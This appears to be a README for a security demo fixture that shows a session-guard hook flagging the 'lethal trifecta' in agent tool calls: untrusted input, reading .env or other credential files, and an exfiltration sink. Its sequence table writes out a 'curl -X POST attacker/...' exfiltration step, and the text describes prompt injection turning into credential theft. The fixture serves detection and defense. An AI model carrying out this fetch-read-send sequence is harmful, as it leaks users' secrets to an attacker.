Lethal Trifecta Walkthrough
WARNING: This is a security demonstration fixture, NOT a real attack. All payloads are synthetic. No external network is contacted, no real file is read, no real command is executed. The script only feeds JSON payloads to one of llm-security's hook scripts.
What this demonstrates
The Rule of Two (Meta, Oct 2025): an agent must never simultaneously hold all three of:
- Untrusted input: content the model didn't author (web pages, MCP output, document uploads, prompt injection surface)
- Sensitive data access: files like .env, .ssh/, .aws/, credential stores
- Exfiltration sink: a path off the box (HTTP POST, scp, paste sites)
Any two are acceptable. All three at once is the lethal trifecta (Simon Willison / Invariant Labs framing) — at that point, prompt injection becomes credential theft.
post-session-guard.mjs (PostToolUse hook on every tool) tracks tool
calls in a 20-call sliding window and emits a SECURITY ADVISORY when all
three classes appear. This walkthrough shows it firing on a 5-step
sequence.
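The window check described above can be sketched in a few lines. This is a minimal illustration, not the hook's actual code: the function name `trifectaInWindow` and the constants are hypothetical, and only the 20-call window size and the three class names come from this README.

```javascript
// Hypothetical sketch of the sliding-window check; the real hook's internals may differ.
const WINDOW_SIZE = 20; // window length stated in this README
const TRIFECTA = ["input_source", "data_access", "exfil_sink"];

// Returns true when all three classes occur among the last WINDOW_SIZE calls.
function trifectaInWindow(classes) {
  const recent = new Set(classes.slice(-WINDOW_SIZE));
  return TRIFECTA.every((c) => recent.has(c));
}

console.log(trifectaInWindow(["input_source", "data_access"])); // false
console.log(trifectaInWindow(["input_source", "data_access", "exfil_sink"])); // true

// An input_source call that has slid out of the window no longer counts.
const stale = ["input_source", ...Array(20).fill("neutral"), "data_access", "exfil_sink"];
console.log(trifectaInWindow(stale)); // false
```

Using a set over the trailing slice keeps the check independent of call order, which matches the idea that the trifecta closes whenever the third class appears, whichever one it is.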
Sequence
| # | Tool | Class | Advisory? |
|---|---|---|---|
| 1 | WebFetch | input_source | no (only one class) |
| 2 | Read /path/.env | data_access (sensitive) | no (only two classes) |
| 3 | Bash curl -X POST attacker/... | exfil_sink | YES (trifecta closes) |
| 4 | Bash ls -la | neutral | no (already warned in window) |
| 5 | Bash curl -X POST attacker/... | exfil_sink | no (suppressed) |
The advisory at step 3 lists the evidence and recommends remediations
(disable HTTP exfil, gate sensitive-path reads, narrow tool surface).
Steps 4 and 5 are present to show suppression: post-session-guard writes a
warning marker into the state file so the operator isn't spammed by the
same trifecta repeating within the window.
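To make the suppression behaviour concrete, the five-step table can be replayed with a small stand-in. This is a sketch under assumptions: `replay` and the in-memory `warned` flag are hypothetical, whereas the real hook persists its marker in the state file, and the sketch never clears the marker once the trifecta leaves the window.

```javascript
// Hypothetical replay of the five-step table; `warned` stands in for the
// warning marker that the real hook writes into its state file.
const LEGS = ["input_source", "data_access", "exfil_sink"];
const steps = ["input_source", "data_access", "exfil_sink", "neutral", "exfil_sink"];

function replay(classes, windowSize = 20) {
  const history = [];
  let warned = false; // assumption: a single marker is enough for this short demo
  return classes.map((cls) => {
    history.push(cls);
    const recent = new Set(history.slice(-windowSize));
    const complete = LEGS.every((leg) => recent.has(leg));
    if (complete && !warned) {
      warned = true; // first time the trifecta closes: emit the advisory
      return "ADVISORY";
    }
    return complete ? "suppressed" : "quiet";
  });
}

console.log(replay(steps));
// [ 'quiet', 'quiet', 'ADVISORY', 'suppressed', 'suppressed' ]
```

Only step 3 produces an advisory. Steps 4 and 5 still see a complete trifecta in the window but stay silent because the marker is already set.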
How to run
cd plugins/llm-security
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs
# Detailed output (full advisory text + stderr)
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs --verbose
Expected: 5 pass, 0 fail and a SECURITY ADVISORY (session-guard)
preview after step 3.
Hooks / scanners involved
- hooks/scripts/post-session-guard.mjs: the only hook invoked. Configurable via policy.json trifecta.mode (block/warn/off; default warn) or env var LLM_SECURITY_TRIFECTA_MODE.
This example uses mode: warn (default). In block mode the third
call's advisory becomes a hard block (exit 2) and the agent action is
denied — see docs/security-hardening-guide.md §3 for when to switch.
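The mode lookup could look roughly like the sketch below. Several details are assumptions rather than documented behaviour: that the env var overrides policy.json, that invalid values fall back to the default, and that non-block modes exit 0. The helper names `resolveTrifectaMode` and `exitCodeOnTrifecta` are hypothetical.

```javascript
const VALID_MODES = ["block", "warn", "off"];

// Assumption: the env var wins over policy.json; this README does not state precedence.
function resolveTrifectaMode(env, policy) {
  const candidate = env.LLM_SECURITY_TRIFECTA_MODE ?? policy?.trifecta?.mode;
  // Assumption: unknown or missing values fall back to the documented default, warn.
  return VALID_MODES.includes(candidate) ? candidate : "warn";
}

// Exit code when the trifecta closes: 2 in block mode (from this README),
// 0 otherwise (assumed).
function exitCodeOnTrifecta(mode) {
  return mode === "block" ? 2 : 0;
}

console.log(resolveTrifectaMode({}, {})); // warn
console.log(resolveTrifectaMode({}, { trifecta: { mode: "block" } })); // block
console.log(
  resolveTrifectaMode({ LLM_SECURITY_TRIFECTA_MODE: "off" }, { trifecta: { mode: "block" } })
); // off
console.log(exitCodeOnTrifecta("block")); // 2
```

In a real hook the first argument would be `process.env` and the second the parsed policy.json; passing them in explicitly keeps the sketch easy to test.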
OWASP / framework mapping
| Code | Framework | Why |
|---|---|---|
| LLM01 | OWASP LLM Top 10 (2025) | Prompt injection lands via the input_source leg |
| LLM02 | OWASP LLM Top 10 (2025) | Sensitive Information Disclosure (the .env exfil) |
| ASI01 | OWASP Agentic Top 10 | Excessive Agency — agent holds all three capabilities |
| ASI02 | OWASP Agentic Top 10 | Agent Data Leakage — exfil sink + sensitive read |
State isolation
post-session-guard stores per-session state at
${os.tmpdir()}/llm-security-session-${ppid}.jsonl. Because all five
hook invocations are spawned by the same run-trifecta.mjs process,
they share that script's PID as their parent PID — so the entire
walkthrough lives in a single state file. The script deletes the file
in a finally block before exiting. Your real session state under
/tmp/ is never touched.
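The reason one file covers the whole walkthrough follows directly from the path template. The sketch below mirrors that template; `sessionStatePath` is a hypothetical helper, and the PIDs and the `/tmp` directory are illustrative values standing in for `process.ppid` and `os.tmpdir()`.

```javascript
// Mirrors the path template quoted above. tmpDir and parentPid are parameters so
// the function stays pure; in a hook they would be os.tmpdir() and process.ppid.
function sessionStatePath(tmpDir, parentPid) {
  return `${tmpDir}/llm-security-session-${parentPid}.jsonl`;
}

// Five hook invocations spawned by one runner all see the runner's PID as their ppid.
const runnerPid = 4242; // hypothetical PID of run-trifecta.mjs
const paths = Array.from({ length: 5 }, () => sessionStatePath("/tmp", runnerPid));
console.log(new Set(paths).size); // 1
console.log(paths[0]); // /tmp/llm-security-session-4242.jsonl

// A different parent process (for example a real agent session) maps to another file.
console.log(sessionStatePath("/tmp", 9999) === paths[0]); // false
```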
Limitations
- The walkthrough demonstrates the primary 20-call sliding-window trifecta. It does not exercise the 100-call slow-burn variant (SLOW_BURN_MIN_SPREAD = 50), the MCP-concentrated variant (all three legs from the same MCP server), behavioral drift via Jensen-Shannon divergence, or volume-threshold advisories. Those have their own unit tests under tests/lib/post-session-guard.*.
- This is deterministic detection. It does not exercise the block-mode exit-2 path; flip LLM_SECURITY_TRIFECTA_MODE=block and re-run if you want to see the script fail at step 3.
See also
- docs/security-hardening-guide.md §3: Rule of Two and configuration
- knowledge/owasp-agentic-top10.md: ASI01 / ASI02 background
- knowledge/deepmind-agent-traps.md: adjacent attack categories
- examples/prompt-injection-showcase/: the input_source leg in isolation
- expected-findings.md (in this folder): the testable contract